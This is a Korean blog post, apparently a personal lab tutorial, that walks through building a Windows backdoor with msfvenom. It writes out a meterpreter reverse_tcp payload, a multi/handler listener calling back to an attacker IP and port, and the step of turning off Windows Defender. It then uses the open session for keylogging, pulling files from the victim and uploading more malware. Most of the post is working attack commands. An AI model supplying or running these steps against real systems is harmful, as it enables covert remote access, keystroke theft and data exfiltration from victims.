반응형




안녕들 하시죠 !


오늘은 Metasploit을 이용해 Backdoor malware를 만들어보겠습니다.


msfvenom이라는 도구를 사용할거구요.

구성 환경은 VMware를 이용해 Kali linux ( 공격자PC ),  Window7 ( 피해자PC )를 사용했습니다. 


아래에는 msfvenom의 옵션입니다.


p : 적용할 페이로드를 선택한다.

lhost : 상대 목표 시스템에서 접속할 공격자의 IP 주소를 입력한다.

lport : 공격자의 로컬 포트넘버.

f : 파일 타입

x : 셸 코드를 넣을 템플릿 파일( 악성 코드를 넣을 원본 파일 ) 을 지정한다.

k : 원본 파일의 원래 기능을 유지하도록 한다.

e : 백신이나 IDS 탐지를 피할 인코더를 선택한다. 선택한 인코더의 적용 횟수를 -i로 지정한다.

o : 최종으로 만들어질 파일의 경로와 파일명을 지정한다.


우선 터미널에 아래의 페이로드를 만들어 파일을 생성합니다.


msfvenom -p windows/meterpreter/reverse_tcp lhost=본인 kali linux IP lport=임의로 지정 -f exe > /root/Desktop/hongpossible.exe ( 악성 코드가 저장될 위치 )



자, 보시면 바탕화면에 hongpossible.exe 라는 악성파일이 생성되었습니다.


VirusTotal 홈페이지에 제가 만든 hongpossible.exe 악성파일를 올려 검증을 받아보겠습니다.

VirusTotal URL입니다.

https://www.virustotal.com/ko/



거의 대부분의 백신에서 악성파일을 탐지하고있네요.

다음번엔 백신을 우회할 수 있는 방법도 알아봐야겠습니다.



이제 host pc ( 저는 window 10 입니다 )에서 windows defender를 끄겠습니다.

검색 -> windows defender 설정 -> windows defender 보안센터 열기 -> 바이러스 및 보안방지 -> 바이러스 및 보안방지 설정 -> 실시간 보호 끄기



다시 kali linux로 돌아와 터미널에서 msfconsole을 입력해 들어가 주시구요, 핸들러를 사용하겠습니다.


use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp ( 페이로드 세팅 )

set lhost 192.168.0.132 ( 공격자 IP )

set lport 7777 ( 공격자 포트 )

exploit -j


이제 Window7 ( 피해자 ) PC에서 hongpossible.exe를 더블클릭해 실행해주시면 세션이 오픈됩니다.

그다음 sessions 를 입력하면 활성화 된 세션을 볼수있습니다.



sessions -i [ ID ] 를 입력 하시면 연결이 됩니다.


sessions -i 1




이제 간단한 명령어를 통해 3가지 실습을 해보려고 하는데요.


첫번째는 키 스니핑 입니다.

keyscan_start로 시작을하고, key_stop으로 서비스를 실행하고 멈출 수 있습니다.

키 입력 내용은 keyscan_dump로 확인 가능합니다.


kali linux에서 keyscan_start를 입력해 주시구요.

피해자 PC에서 메모장을 켜고 Hello World !를 입력해봤습니다.



위의 이미지를 보시면 피해자 PC에서 입력한 내용을 그대로 훔쳐볼 수 있습니다.


두번째는 방금 피해자PC 에서 입력한 메모장을 Hello라는 폴더에 넣겠습니다.

그리고, download Hello /root/Desktop 명령을 통해 Hello폴더 안에 있는 파일을 kali linux 의 /root/Desktop 경로로 가져오는 명령을 해보겠습니다.



세번째는 upload입니다.

앞에서 hongpossible.exe 를 만든 방법과 동일하게 hello.exe 라는 악성파일을 만들었습니다.

그리고 나서 upload Desktop/hello.exe 명령을 통해 kali linux의 바탕화면에 있는 hello.exe 악성파일을 업로드 시켜보겠습니다.



성공했습니다. 네번째 방법은 다음 게시물에서 진행하겠습니다.


아직 metasploit에 익숙치 못해 하루종일 삽질을 한것 같네요... 하지만 배운것도 많은 하루였습니다.


오늘은 여기까지 입니다 감사합니다 !




참고서적 이상한 「웹해킹 입문」 프리렉(2016) p172~191

studysecurity님의 블로그, Metasploit 실습2 참고

https://m.blog.naver.com/PostList.nhn?blogId=studysecurity

+ Recent posts